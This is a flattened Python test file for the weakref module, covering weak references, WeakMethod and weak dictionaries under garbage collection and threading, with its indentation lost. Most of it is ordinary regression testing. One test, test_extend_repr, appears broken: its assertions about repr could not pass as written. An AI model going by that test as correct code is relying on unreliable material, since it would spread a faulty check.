self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
self.assertFalse(a == x)
self.assertTrue(a != x)
self.assertTrue(a == ALWAYS_EQ)
self.assertFalse(a != ALWAYS_EQ)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
# - retain their hash is they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
# Compare with different types
_ne(a, x.some_method)
_eq(a, ALWAYS_EQ)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
def test_extend_repr(self):
class ExtendRef(weakref.ref):
pass
# Dead weak ref
a = Object(1)
ra = ExtendRef(a)
self.assertIn("ExtendRef", repr(a))
b = Object(1)
c = {"ref": b}
rb = ExtendRef
self.assertIn("ExtendRef", repr(b))
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
# Since underlaying dict is ordered, first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_valued_union_operators(self):
a = C()
b = C()
c = C()
wvd1 = weakref.WeakValueDictionary({1: a})
wvd2 = weakref.WeakValueDictionary({1: b, 2: a})
wvd3 = wvd1.copy()
d1 = {1: c, 3: b}
pairs = [(5, c), (6, b)]
tmp1 = wvd1 | wvd2 # Between two WeakValueDictionaries
self.assertEqual(dict(tmp1), dict(wvd1) | dict(wvd2))
self.assertIs(type(tmp1), weakref.WeakValueDictionary)
wvd1 |= wvd2
self.assertEqual(wvd1, tmp1)
tmp2 = wvd2 | d1 # Between WeakValueDictionary and mapping
self.assertEqual(dict(tmp2), dict(wvd2) | d1)
self.assertIs(type(tmp2), weakref.WeakValueDictionary)
wvd2 |= d1
self.assertEqual(wvd2, tmp2)
tmp3 = wvd3.copy() # Between WeakValueDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wvd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakValueDictionary)
tmp4 = d1 | wvd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wvd3))
self.assertIs(type(tmp4), weakref.WeakValueDictionary)
del a
self.assertNotIn(2, tmp1)
self.assertNotIn(2, tmp2)
self.assertNotIn(1, tmp3)
self.assertNotIn(1, tmp4)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_keyed_union_operators(self):
o1 = C()
o2 = C()
o3 = C()
wkd1 = weakref.WeakKeyDictionary({o1: 1, o2: 2})
wkd2 = weakref.WeakKeyDictionary({o3: 3, o1: 4})
wkd3 = wkd1.copy()
d1 = {o2: '5', o3: '6'}
pairs = [(o2, 7), (o3, 8)]
tmp1 = wkd1 | wkd2 # Between two WeakKeyDictionaries
self.assertEqual(dict(tmp1), dict(wkd1) | dict(wkd2))
self.assertIs(type(tmp1), weakref.WeakKeyDictionary)
wkd1 |= wkd2
self.assertEqual(wkd1, tmp1)
tmp2 = wkd2 | d1 # Between WeakKeyDictionary and mapping
self.assertEqual(dict(tmp2), dict(wkd2) | d1)
self.assertIs(type(tmp2), weakref.WeakKeyDictionary)
wkd2 |= d1
self.assertEqual(wkd2, tmp2)
tmp3 = wkd3.copy() # Between WeakKeyDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wkd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakKeyDictionary)
tmp4 = d1 | wkd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wkd3))
self.assertIs(type(tmp4), weakref.WeakKeyDictionary)
del o1
self.assertNotIn(4, tmp1.values())
self.assertNotIn(4, tmp2.values())
self.assertNotIn(1, tmp3.values())
self.assertNotIn(1, tmp4.values())
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
